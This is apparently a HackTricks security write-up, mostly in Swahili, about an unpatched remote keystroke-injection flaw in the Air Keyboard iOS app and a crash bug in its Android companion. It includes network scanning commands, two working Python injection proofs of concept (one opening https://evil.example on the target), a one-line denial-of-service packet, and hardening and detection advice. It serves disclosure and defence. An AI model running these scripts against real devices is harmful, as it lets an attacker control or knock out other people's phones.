# Air Keyboard Remote Input Injection (Unauthenticated TCP / WebSocket Listener) {{#include ../../banners/hacktricks-training.md}} ## TL;DR Toleo la iOS la programu ya kibiashara **“Air Keyboard”** (App Store ID 6463187929) linaonyesha huduma ya mtandao wa ndani ambayo **inapokea fremu za funguo bila uthibitisho wowote au uthibitisho wa chanzo**. Kulingana na toleo lililowekwa huduma hiyo ni: * **≤ 1.0.4** – msikilizaji wa TCP wa kawaida kwenye **bandari 8888** inayotarajia kichwa cha urefu wa byte 2 kinachofuatiwa na *device-id* na mzigo wa ASCII. * **≥ 1.0.5 (Juni 2025)** – msikilizaji wa **WebSocket** kwenye *bandari hiyo hiyo* (**8888**) inayochambua funguo za **JSON** kama `{"type":1,"text":"…"}`. Kila kifaa kwenye Wi-Fi / subnet hiyo hiyo kinaweza hivyo **kuingiza pembejeo za kibodi zisizo na mipaka kwenye simu ya mwathirika, kufikia utekaji wa mwingiliano wa mbali**. Kijengwa cha Android kinachosindikiza kinakusikiliza kwenye **bandari 55535**. Kinafanya mkono dhaifu wa AES-ECB lakini takataka iliyoundwa bado inasababisha **kosa lisiloshughulikiwa ndani ya OpenSSL**, ikisababisha huduma ya nyuma kuanguka (**DoS**). > Uthibitisho wa usalama **bado haujarekebishwa wakati wa kuandika (Julai 2025)** na programu hiyo inapatikana bado kwenye Duka la Programu. --- ## 1. Huduma ya Ugunduzi Scan mtandao wa ndani na utafute bandari mbili zilizowekwa zinazotumiwa na programu: ```bash # iOS (unauthenticated input-injection) nmap -p 8888 --open 192.168.1.0/24 # Android (weakly-authenticated service) nmap -p 55535 --open 192.168.1.0/24 ``` Katika simu za Android unaweza kubaini kifurushi kinachohusika kwa ndani: ```bash adb shell netstat -tulpn | grep 55535 # no root required on emulator # rooted device / Termux netstat -tulpn | grep LISTEN ls -l /proc//cmdline # map PID → package name ``` Katika **iOS iliyovunjwa** unaweza kufanya kitu kinachofanana na `lsof -i -nP | grep LISTEN | grep 8888`. --- ## 2. Maelezo ya Protokali (iOS) ### 2.1 Urithi (≤ 1.0.4) – fremu za binary za kawaida ``` [length (2 bytes little-endian)] [device_id (1 byte)] [payload ASCII keystrokes] ``` Ilani ya *urefu* inajumuisha byte ya `device_id` **lakini sio** kichwa cha byte mbili yenyewe. ### 2.2 Sasa (≥ 1.0.5) – JSON kupitia WebSocket Toleo 1.0.5 lilihamishwa kimya kimya kwenda WebSockets huku likihifadhi nambari ya bandari bila kubadilisha. Kichocheo kidogo cha funguo kinaonekana kama: ```json { "type": 1, // 1 = insert text, 2 = special key "text": "open -a Calculator\n", "mode": 0, "shiftKey": false, "selectionStart": 0, "selectionEnd": 0 } ``` Hakuna mkono wa mkono, token au saini inayohitajika - kitu cha kwanza cha JSON tayari kinachochea tukio la UI. --- ## 3. Utekelezaji PoC ### 3.1 Kulenga ≤ 1.0.4 (raw TCP) ```python #!/usr/bin/env python3 """Inject arbitrary keystrokes into Air Keyboard ≤ 1.0.4 (TCP mode)""" import socket, sys target_ip = sys.argv[1] # e.g. 192.168.1.50 keystrokes = b"open -a Calculator\n" # payload visible to the user frame = bytes([(len(keystrokes)+1) & 0xff, (len(keystrokes)+1) >> 8]) frame += b"\x01" # device_id = 1 (hard-coded) frame += keystrokes with socket.create_connection((target_ip, 8888)) as s: s.sendall(frame) print("[+] Injected", keystrokes) ``` ### 3.2 Kulenga ≥ 1.0.5 (WebSocket) ```python #!/usr/bin/env python3 """Inject keystrokes into Air Keyboard ≥ 1.0.5 (WebSocket mode)""" import json, sys, websocket # `pip install websocket-client` target_ip = sys.argv[1] ws = websocket.create_connection(f"ws://{target_ip}:8888") ws.send(json.dumps({ "type": 1, "text": "https://evil.example\n", "mode": 0, "shiftKey": False, "selectionStart": 0, "selectionEnd": 0 })) ws.close() print("[+] URL opened on target browser") ``` *ASCII yoyote inayoweza kuchapishwa — ikiwa ni pamoja na line-feeds, tabs na funguo nyingi maalum — inaweza kutumwa, ikimpa mshambuliaji nguvu sawa na ingizo la mtumiaji wa kimwili: kuzindua programu, kutuma IMs, kufungua URL za uharibifu, kubadilisha mipangilio, n.k.* --- ## 4. Android Companion – Denial-of-Service Bandari ya Android (55535) inatarajia **neno la siri la herufi 4 lililofichwa kwa kutumia funguo za AES-128-ECB zilizowekwa kwa ngumu** ikifuatiwa na nonce ya nasibu. Makosa ya uchambuzi yanapanda hadi `AES_decrypt()` na hayakamatwi, yakimaliza nyuzi za msikilizaji. Paket moja iliyo na makosa inatosha kuwafanya watumiaji halali wawe nje ya mtandao hadi mchakato urudiwa. ```python import socket socket.create_connection((victim, 55535)).send(b"A"*32) # minimal DoS ``` --- ## 5. Programu Zinazohusiana – Mfano wa Mara kwa Mara wa Kupinga Air Keyboard **siyo kesi ya pekee**. Programu nyingine za simu za “remote keyboard/mouse” zimekuja na kasoro hiyo hiyo: * **Telepad ≤ 1.0.7** – CVE-2022-45477/78 inaruhusu utekelezaji wa amri zisizo na uthibitisho na uandishi wa funguo za maandiko wazi. * **PC Keyboard ≤ 30** – CVE-2022-45479/80 RCE isiyo na uthibitisho & ufuatiliaji wa trafiki. * **Lazy Mouse ≤ 2.0.1** – CVE-2022-45481/82/83 hakuna-siri ya chaguo-msingi, PIN dhaifu ya nguvu na uvujaji wa maandiko wazi. Mifano hii inaonyesha kutokujali kwa mfumo wa **uso wa mashambulizi yanayoelekezwa kwenye mitandao katika programu za simu**. --- ## 6. Sababu za Msingi 1. **Hakuna ukaguzi wa asili / uaminifu** kwenye fremu zinazokuja (iOS). 2. **Matumizi mabaya ya cryptographic** (funguo ya kudumu, ECB, ukosefu wa uthibitisho wa urefu) na **ukosefu wa usimamizi wa makosa** (Android). 3. **Haki ya Mtumiaji ya Mtandao wa Mitaa ≠ usalama** – iOS inahitaji idhini ya wakati wa kukimbia kwa trafiki ya LAN, lakini haitoi uthibitisho sahihi. --- ## 7. Kuimarisha & Hatua za Kijamii Mapendekezo ya waendelezaji: * Fungamanisha msikilizaji na **`127.0.0.1`** na tunnel kupitia **mTLS** au **Noise XX** ikiwa udhibiti wa mbali unahitajika. * Pata **siri za kifaa kila wakati wakati wa kuanzisha** (mfano, QR code au PIN ya Kuunganisha) na kulazimisha *uthibitisho wa pamoja* kabla ya kushughulikia ingizo. * Adopt **Apple Network Framework** na *NWListener* + TLS badala ya soketi za kawaida. * Tekeleza **ukaguzi wa akili wa urefu** na usimamizi wa makosa ulioandaliwa wakati wa kufungua au kufasiri fremu. Mafanikio ya haraka ya Blue-/Red-Team: * **Uwindaji wa Mtandao:** `sudo nmap -n -p 8888,55535 --open 192.168.0.0/16` au chujio cha Wireshark `tcp.port == 8888`. * **Ukaguzi wa wakati wa kukimbia:** Skripti ya Frida inashikilia `socket()`/`NWConnection` ili orodhesha wasikilizaji wasiotarajiwa. * **Ripoti ya Faragha ya Programu ya iOS (Mipangilio ▸ Faragha & Usalama ▸ Ripoti ya Faragha ya Programu)** inaonyesha programu zinazowasiliana na anwani za LAN – muhimu kwa kugundua huduma za uasi. * **Mobile EDRs** zinaweza kuongeza sheria rahisi za Yara-L kwa funguo za JSON `"selectionStart"`, `"selectionEnd"` ndani ya mzigo wa TCP wa maandiko wazi kwenye bandari 8888. --- ## Karatasi ya Udhibiti (Pentesters) ```bash # Locate vulnerable devices in a /24 and print IP + list of open risky ports nmap -n -p 8888,55535 --open 192.168.1.0/24 -oG - \ | awk '/Ports/{print $2 " " $4}' # Inspect running sockets on a connected Android target adb shell "for p in $(lsof -PiTCP -sTCP:LISTEN -n -t); do \ echo -n \"$p → \"; cat /proc/$p/cmdline; done" ``` --- ## Marejeo - [Exploit-DB 52333 – Air Keyboard iOS App 1.0.5 Remote Input Injection](https://www.exploit-db.com/exploits/52333) - [Mobile-Hacker Blog (17 Jul 2025) – Remote Input Injection Vulnerability in Air Keyboard iOS App Still Unpatched](https://www.mobile-hacker.com/2025/07/17/remote-input-injection-vulnerability-in-air-keyboard-ios-app-still-unpatched/) {{#include ../../banners/hacktricks-training.md}}